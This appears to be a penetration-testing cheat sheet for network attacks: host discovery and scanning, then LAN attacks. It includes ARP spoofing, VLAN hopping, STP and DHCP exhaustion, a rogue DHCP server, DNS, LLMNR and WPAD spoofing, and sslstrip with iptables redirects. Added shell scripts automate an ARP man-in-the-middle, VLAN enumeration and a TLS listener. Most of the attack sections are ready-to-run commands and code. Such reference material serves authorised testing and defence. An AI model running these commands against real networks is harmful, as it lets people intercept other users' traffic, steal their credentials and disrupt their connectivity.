Discovering Hosts from the Outside
When you have a scope of IP ranges and need to find which hosts are responding:
ICMP
ping -c 1 199.66.11.4 # Echo request to a single host
fping -g 199.66.11.0/24 # Echo requests to a range
nmap -PE -PM -PP -sn -n 199.66.11.0/24 # Echo, timestamp, and subnet mask requests
TCP Port Discovery
# Fast scan of top 20 ports using masscan
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
HTTP Port Discovery
masscan -p80,443,8000-8100,8443 199.66.11.0/24
UDP Port Discovery
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
Discovering Hosts from the Inside
Passive
netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on
net.show
Active
# ARP discovery
nmap -sn <Network> # ARP requests
netdiscover -r <Network> # ARP requests
# NBT discovery
nbtscan -r 192.168.0.1/24
# Bettercap probing (set the options before switching the module on)
set net.probe.mdns true
set net.probe.nbns true
net.probe on
Scanning Hosts
TCP Scanning
# Fast scan: top 1000 TCP ports with version detection, default scripts and OS guess
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Full port scan (all 65535 TCP ports)
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Full scan at the default timing; use it when -T4 drops results on slow or lossy links
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
UDP Scanning
# Quick check of the top 100 UDP ports
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
SCTP Scanning
nmap -T4 -sY -n -oA SCTPFastScan <IP>
nmap -T4 -p- -sY -sV -sC -n -oA SCTPAllScan <IP> # all ports; -F cannot be combined with -p-
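The two scanners are usually chained: masscan to find what answers, then nmap with -sV/-sC only against the ports that are already known to be open. The script below is an added example (not code from the original page) that does the plumbing: it reduces masscan's list output (-oL) to a target list and per-host port list, parses the .gnmap file that nmap -oA writes into "ip port/proto service" lines, and builds the follow-up nmap command. The scanner outputs embedded in it are constructed for the demo, and the IP addresses are the page's example range.

```sh
#!/bin/sh
# Added example, not code from the original page: glue masscan output to a
# targeted nmap pass. All sample scanner output below is constructed.

# masscan -oL writes one finding per line:  open tcp 80 199.66.11.4 1700000000
masscan_hosts() {            # $1 = masscan -oL file -> unique IPs, one per line
    awk '$1 == "open" { print $4 }' "$1" | sort -u
}

masscan_ports_for() {        # $1 = -oL file, $2 = IP -> comma-separated open ports
    awk -v ip="$2" '$1 == "open" && $4 == ip { print $3 }' "$1" | sort -n -u \
        | awk '{ printf "%s%s", (NR > 1 ? "," : ""), $1 } END { print "" }'
}

# .gnmap packs every port into one tab-separated "Ports:" field, each entry as
# port/state/proto/owner/service/rpcinfo/version/
gnmap_open_ports() {         # $1 = .gnmap file -> "IP port/proto service" per open port
    awk -F'\t' '
        /\tPorts: / {
            ip = $1; sub(/^Host: /, "", ip); sub(/ .*/, "", ip)
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
            n = split(ports, entry, ", *")
            for (j = 1; j <= n; j++) {
                split(entry[j], f, "/")
                if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
            }
        }' "$1"
}

followup_scan() {            # $1 = -oL file, $2 = IP: version/script scan on the open ports only
    ports=$(masscan_ports_for "$1" "$2")
    if [ -z "$ports" ]; then echo "no open ports recorded for $2" >&2; return 1; fi
    ${DRY_RUN:+echo} nmap -sV -sC -n -Pn -p "$ports" -oA "scan_$2" "$2"   # DRY_RUN=1 only prints
}

# --- constructed sample data (what masscan -oL and nmap -oA would have written) ---
TMP=$(mktemp -d); trap 'rm -rf "$TMP"' EXIT
cat > "$TMP/masscan.list" <<'EOF'
#masscan
open tcp 443 199.66.11.4 1700000001
open tcp 80 199.66.11.4 1700000000
open tcp 22 199.66.11.9 1700000002
open tcp 80 199.66.11.4 1700000003
# end
EOF
printf 'Host: 199.66.11.4 ()\tStatus: Up\n' > "$TMP/fastscan.gnmap"
printf 'Host: 199.66.11.4 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, 80/open/tcp//http//nginx 1.18.0/, 443/filtered/tcp//https///\tIgnored State: closed (997)\n' >> "$TMP/fastscan.gnmap"

masscan_hosts "$TMP/masscan.list"                    # 199.66.11.4 and 199.66.11.9, duplicate dropped
masscan_ports_for "$TMP/masscan.list" 199.66.11.4    # 80,443
gnmap_open_ports "$TMP/fastscan.gnmap"               # 22/tcp ssh and 80/tcp http; filtered 443 skipped
DRY_RUN=1 followup_scan "$TMP/masscan.list" 199.66.11.9
```

Drop DRY_RUN to actually run the follow-up scan; the .gnmap parser then works on the scan_<IP>.gnmap files it produces, so the same functions feed later tooling.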
Sniffing
TCPDump
sudo tcpdump -i <INTERFACE> udp port 53 # DNS requests
tcpdump -i <INTERFACE> icmp # ICMP packets
# Capture over SSH and view in Wireshark live
ssh user@<TARGET_IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
Bettercap
set net.sniff.output sniffed.pcap
set net.sniff.local true
net.sniff on
LAN Attacks
ARP Spoofing
# Bettercap (set the targets before switching the module on)
set arp.spoof.targets <IP>
set arp.spoof.fullduplex true
arp.spoof on
# arpspoof (dsniff): enable forwarding first, or the victim loses connectivity and notices
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2 # tell .1 (the gateway) that we are .2 (the victim)
arpspoof -t 192.168.1.2 192.168.1.1 # tell .2 (the victim) that we are .1 (the gateway)
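Run by hand, the three commands above leave forwarding switched on and the two arpspoof processes running if the terminal dies. The wrapper below is an added example (not code from the original page): it records the current ip_forward value, enables forwarding, starts both arpspoof directions, and on exit or Ctrl-C sends SIGINT to both so they re-ARP the victims with the real MACs, then restores the old forwarding value. Interface and addresses are arguments; the /proc path is a variable only so the save/restore logic can be exercised against a temporary file.

```sh
#!/bin/sh
# Added example, not code from the original page: ARP MITM with guaranteed cleanup.
# Usage (as root):  ./arp_mitm.sh --run eth0 192.168.1.2 192.168.1.1

IPFWD=${IPFWD:-/proc/sys/net/ipv4/ip_forward}   # overridable so the logic can be tested without root
SAVED_IPFWD=
PID_TO_VICTIM=; PID_TO_GATEWAY=

enable_forwarding() {        # remember the current setting, then turn forwarding on
    SAVED_IPFWD=$(cat "$IPFWD")
    echo 1 > "$IPFWD"
}

restore_forwarding() {       # put back exactly the value found at start
    if [ -n "$SAVED_IPFWD" ]; then echo "$SAVED_IPFWD" > "$IPFWD"; fi
}

stop_poisoning() {           # SIGINT makes arpspoof re-ARP the victims with the real MACs before exiting
    for pid in $PID_TO_VICTIM $PID_TO_GATEWAY; do kill -INT "$pid" 2>/dev/null || true; done
    PID_TO_VICTIM=; PID_TO_GATEWAY=
}

start_poisoning() {          # $1 = iface, $2 = victim IP, $3 = gateway IP
    # tell the victim we are the gateway ...
    arpspoof -i "$1" -t "$2" "$3" >/dev/null 2>&1 & PID_TO_VICTIM=$!
    # ... and tell the gateway we are the victim, so both directions pass through us
    arpspoof -i "$1" -t "$3" "$2" >/dev/null 2>&1 & PID_TO_GATEWAY=$!
}

cleanup() { stop_poisoning; restore_forwarding; }

main() {
    if [ $# -ne 3 ]; then echo "usage: $0 --run <iface> <victim_ip> <gateway_ip>" >&2; exit 2; fi
    trap cleanup EXIT INT TERM
    enable_forwarding
    start_poisoning "$1" "$2" "$3"
    echo "poisoning $2 <-> $3 on $1 (ip_forward was $SAVED_IPFWD, now 1); Ctrl-C stops and restores"
    wait                     # block until the arpspoof processes end or we are interrupted
}

if [ "${1:-}" = "--run" ]; then shift; main "$@"; fi
```

While it runs, the sniffing commands from the previous section see both halves of the victim's conversations on the same interface.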
VLAN Hopping (802.1Q / DTP)
A switch port left in DTP's Dynamic Auto mode (a common default) becomes a trunk as soon as the peer, which can be the attacker's host, sends a DTP frame requesting trunking. Once the port is trunking, the attacker can tag frames for, and receive traffic from, every VLAN allowed on that trunk.
# Check if switch is vulnerable
dtpscan.sh
# Enable trunking via Yersinia
yersinia -G # Graphical mode
To configure a VLAN interface for a specific VLAN:
modprobe 8021q
vconfig add eth1 250 # creates eth1.250 (vconfig is deprecated; current systems use iproute2's ip link instead)
dhclient eth1.250
arp-scan -I eth1.250 10.121.5.0/24
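Once the port is trunking, the interesting question is which VLAN IDs carry hosts. The script below is an added example (not code from the original page) that walks a list of VLAN IDs: for each one it creates the 802.1Q sub-interface with iproute2 (the replacement for vconfig), asks for a DHCP lease with a short timeout, ARP-scans whatever subnet the lease landed in, and removes the sub-interface again. The interface name and VLAN IDs are arguments; DRY_RUN=1 prints the commands instead of executing them, which needs no root.

```sh
#!/bin/sh
# Added example, not code from the original page: enumerate VLANs over a trunk port.
# Usage (as root):  ./vlan_enum.sh --run eth1 10 20 250

run() { ${DRY_RUN:+echo} "$@"; }   # prefix every privileged command with echo in dry-run mode

vlan_up() {                  # $1 = parent iface, $2 = VLAN id -> creates $1.$2
    run modprobe 8021q
    run ip link add link "$1" name "$1.$2" type vlan id "$2"
    run ip link set "$1.$2" up
}

vlan_down() {                # $1 = parent iface, $2 = VLAN id
    run ip link del "$1.$2"
}

vlan_probe() {               # $1 = parent iface, $2 = VLAN id
    sub="$1.$2"
    vlan_up "$1" "$2"
    # -1: a single DISCOVER attempt; an unused or DHCP-less VLAN would otherwise hang us
    if run timeout 20 dhclient -1 "$sub"; then
        run arp-scan -I "$sub" --localnet      # enumerate the subnet the lease put us in
    else
        echo "VLAN $2: no DHCP lease; try a static address from the VLAN's range" >&2
    fi
    vlan_down "$1" "$2"
}

main() {
    if [ $# -lt 2 ]; then echo "usage: $0 --run <iface> <vlan_id> [vlan_id ...]" >&2; exit 2; fi
    parent=$1; shift
    for vid in "$@"; do vlan_probe "$parent" "$vid"; done
}

if [ "${1:-}" = "--run" ]; then shift; main "$@"; fi
```

The sub-interface is torn down after each VLAN so that a long ID list does not leave dozens of interfaces behind; drop the vlan_down call to keep one up for further work.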
STP Attacks
# STP root attack: claim the root bridge role so inter-switch traffic is re-routed through us
yersinia stp -attack 4
# STP TCN attack: send topology change notifications so switches keep flushing their CAM tables (15-second aging) and flood unicast traffic
yersinia stp -attack 1
DHCP Attacks
# DHCP enumeration
nmap --script broadcast-dhcp-discover
# DHCP DoS (exhaust IP pool)
yersinia dhcp -attack 1
# Rogue DHCP server
python /usr/share/responder/DHCP.py -i 10.0.0.100 -r 10.0.0.1 -p 10.0.0.100 -I eth1 -S -R
Spoofing
DNS Spoofing
# Bettercap
set dns.spoof.hosts ./dns.spoof.hosts
dns.spoof on
ICMP Redirect
Send a forged ICMP type 5 (Redirect) code 1 (redirect for host), spoofed from the current gateway, telling the victim to reach a destination via the attacker's address. Hosts with accept_redirects disabled ignore it.
LLMNR/NBT-NS Spoofing
Use Responder to answer LLMNR and NBT-NS name lookups that the local DNS could not resolve, impersonating the requested host. Effective against Windows environments.
WPAD Spoofing
Browsers use WPAD to auto-discover proxy settings. Responder can answer the WPAD lookup and serve a malicious proxy configuration.
sslStrip
Downgrade HTTPS to HTTP to sniff credentials in cleartext. Run it alongside ARP spoofing so the victim's HTTP traffic passes through this host:
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT
sslstrip and sslstrip+ no longer work against modern browsers for any site on the HSTS preload list, or a subdomain of a preloaded site that sets includeSubDomains: the browser rewrites the request to HTTPS before it leaves the machine, so there is no plaintext request to intercept. Sites that only send the HSTS header at runtime remain exposed until the browser has seen the header once.
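Before setting up ARP spoofing plus sslstrip it is worth reading the target's response headers and classifying its HSTS policy. The function below is an added example (not code from the original page): it reads raw headers from stdin and reports none, disabled (max-age=0 clears the policy), or hsts with the includeSubDomains and preload tokens flagged. The sample responses are constructed; the target hostname in the usage line is a placeholder.

```sh
#!/bin/sh
# Added example, not code from the original page: classify a site's HSTS policy.
#   curl -sI https://<target> | hsts_status

hsts_status() {              # stdin = HTTP response headers -> none | disabled | hsts[+subdomains][+preload]
    hdr=$(tr -d '\r' | tr 'A-Z' 'a-z' | grep '^strict-transport-security:' | head -n 1)
    if [ -z "$hdr" ]; then echo none; return 0; fi
    max=$(printf '%s\n' "$hdr" | sed -n 's/.*max-age=\([0-9][0-9]*\).*/\1/p')
    if [ -z "$max" ] || [ "$max" -eq 0 ]; then echo disabled; return 0; fi   # max-age=0 removes the policy
    out=hsts
    case "$hdr" in *includesubdomains*) out="$out+subdomains" ;; esac
    case "$hdr" in *preload*) out="$out+preload" ;; esac
    echo "$out"
}

# constructed sample responses (CRLF line endings as on the wire)
sample_plain()    { printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n'; }
sample_basic()    { printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=300\r\n\r\n'; }
sample_preload()  { printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n\r\n'; }
sample_disabled() { printf 'HTTP/1.1 200 OK\r\nStrict-Transport-Security: max-age=0\r\n\r\n'; }

sample_plain   | hsts_status   # none: the downgrade has a chance
sample_basic   | hsts_status   # hsts: only a browser that has never seen this header is downgradable
sample_preload | hsts_status   # hsts+subdomains+preload: no chance if the domain really is on the list
```

The preload token in the header only says the operator asked to be on the list; the browser's built-in list is what actually decides, so treat hsts+preload as a strong hint rather than proof.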
TCP / SSL Listeners
# Listen on TCP port
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -
# Generate a self-signed certificate (2048-bit RSA; 1024-bit keys are rejected by current clients and OpenSSL security levels)
FILENAME=server
openssl genrsa -out $FILENAME.key 2048
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -subj "/CN=$FILENAME" -out $FILENAME.crt
cat $FILENAME.key $FILENAME.crt > $FILENAME.pem
# Listen with SSL (verify=0: do not ask the client for a certificate)
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -
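The certificate above carries only a CN. Modern clients ignore the CN and reject a certificate with no subjectAltName, so a client that connects to the listener gets a hard error rather than the usual self-signed warning. The script below is an added example (not code from the original page) that generates a 2048-bit key and a self-signed certificate with a SAN in one openssl call (OpenSSL 1.1.1 or later), bundles key and certificate into the .pem that socat expects, and prints the SAN back so you can confirm what the client will see. The basename, hostname and IP in the usage lines are placeholders.

```sh
#!/bin/sh
# Added example, not code from the original page: SAN-bearing self-signed cert plus socat TLS listener.
# Usage:  ./tls_listener.sh --make server target.test 10.0.0.5
#         ./tls_listener.sh --listen server.pem 443      (as root)

make_selfsigned() {          # $1 = output basename, $2 = DNS name, $3 = optional IP
    san="DNS:$2"
    if [ -n "${3:-}" ]; then san="$san,IP:$3"; fi
    openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 365 \
        -subj "/CN=$2" -addext "subjectAltName=$san" \
        -keyout "$1.key" -out "$1.crt" 2>/dev/null
    cat "$1.key" "$1.crt" > "$1.pem"
    chmod 600 "$1.key" "$1.pem"         # the bundle contains the private key
}

cert_san() {                 # $1 = certificate -> its SAN list, e.g. "DNS:target.test, IP Address:10.0.0.5"
    openssl x509 -in "$1" -noout -ext subjectAltName | sed -n '2s/^ *//p'
}

tls_listen() {               # $1 = pem bundle, $2 = port: accept TLS, dump what the client sends
    socat -v openssl-listen:"$2",reuseaddr,fork,cert="$1",verify=0 -
}

case "${1:-}" in
    --make)   make_selfsigned "$2" "$3" "${4:-}"; echo "SAN: $(cert_san "$2.crt")" ;;
    --listen) tls_listen "$2" "$3" ;;
esac
```

Point a client at the listener with the SAN hostname (or the IP, if one was included) and the only complaint left is the untrusted issuer, which is what you expect from a self-signed certificate.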